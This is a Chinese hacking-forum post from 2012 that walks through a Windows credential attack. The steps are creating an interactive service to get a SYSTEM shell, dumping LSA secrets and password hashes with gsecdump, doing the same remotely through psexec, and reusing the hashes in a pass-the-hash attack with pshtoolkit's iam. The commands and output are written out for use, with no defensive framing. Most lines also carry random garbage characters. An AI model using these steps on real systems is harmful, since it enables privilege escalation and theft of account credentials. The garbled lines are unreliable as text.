找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2088|回复: 0
打印 上一主题 下一主题

HASH注入式攻击

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-6 21:09:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
o get a DOS Prompt as NT system:
! H- b. x# z8 f0 b6 w: |- N! x: N# d/ ?! q2 l7 {* T
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact6 H8 y. r' w% I
[SC] CreateService SUCCESS0 x% J; M6 d9 x. b- L
! y: Q6 y4 b! X* k' A8 ?& D
C:\>sc start shellcmdline
$ w" Y6 h4 O7 ?, O9 E[SC] StartService FAILED 1053:6 L2 T7 ~& V' J% q; L0 V5 L. r

2 j, b4 T2 c) j3 _The service did not respond to the start or control request in a timely fashion.$ B& Y' e3 |4 \6 m; o3 S; K

- H$ [, I. y$ U9 c1 O; iC:\>sc delete shellcmdline
( w& E" Z& ?# ]( F* z/ d! C[SC] DeleteService SUCCESS
3 J8 _; i: x: w+ t) l  C1 }4 r- T
------------# x) D3 ^# E1 Q6 I1 a, p
) d* Q+ y6 X; P6 |8 D5 W5 I) {
Then in the new DOS window:
0 D) `8 m' v: r0 `0 G) K8 O' Y. m# X2 l
3 R0 ~! w0 b. S% P! LMicrosoft Windows XP [Version 5.1.2600]
, M- f% X  e$ }$ \: A(C) Copyright 1985-2001 Microsoft Corp.
1 a- F/ h1 g5 w6 u6 K& x4 s; g0 X" k- B9 [# B9 _
C:\WINDOWS\system32>whoami% B, q  J+ R; V* D
NT AUTHORITY\SYSTEM0 t, Q% s$ d. ?3 V# c
. n- g4 N3 f5 q
C:\WINDOWS\system32>gsecdump -h, ~) Q) _9 q- W6 q& C
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)) X- v* W9 i# L# I/ M/ k# J4 C
usage: gsecdump [options]
+ O9 e. T& h- O/ ^6 j# f* v8 K) J# v; J
options:! w0 h9 F' ?* A# U2 @4 f
-h [ --help ] show help
- f4 y' j$ z; E$ U-a [ --dump_all ] dump all secrets
; @, v( f% |/ W/ A( n-l [ --dump_lsa ] dump lsa secrets
4 D* p3 J+ X" h  X-w [ --dump_wireless ] dump microsoft wireless connections
/ y2 y3 ]2 E0 X/ m; V-u [ --dump_usedhashes ] dump hashes from active logon sessions
; k( d9 L7 M1 ?' J( d-s [ --dump_hashes ] dump hashes from SAM/AD
4 {& P5 z* |- X: f. N
. N; N, B  {0 yAlthough I like to use:
+ @2 K1 C& X! h& R$ M* j$ x8 C1 s* `9 |9 C8 L, Y! z, v1 f
PsExec v1.83 - Execute processes remotely
1 {; ~$ O4 |9 v. e1 r. uCopyright (C) 2001-2007 Mark Russinovich
& n0 L; y3 w, R3 a* n8 ISysinternals - 链接标记[url]www.sysinternals.com[/url]
. O7 j2 {+ x/ t* z4 B
! j, V' z. K$ }C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT# u: y$ i; {2 ?

  ?# n2 N, x* fto get the hashes from active logon sessions of a remote system.2 o) C3 R* m* {4 p6 Z3 w$ r

+ r. k" ]. R; y* k: {, ~These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.) X6 v' Q  t/ S

$ B9 r' U# G+ E7 e提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
+ k: k) F1 `" I$ L: J原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
" o% ?& Q. ~0 h3 G' J: p5 g6 e$ V! s0 z# X
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
' l9 d: o8 _5 [: d7 I* ~, m
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表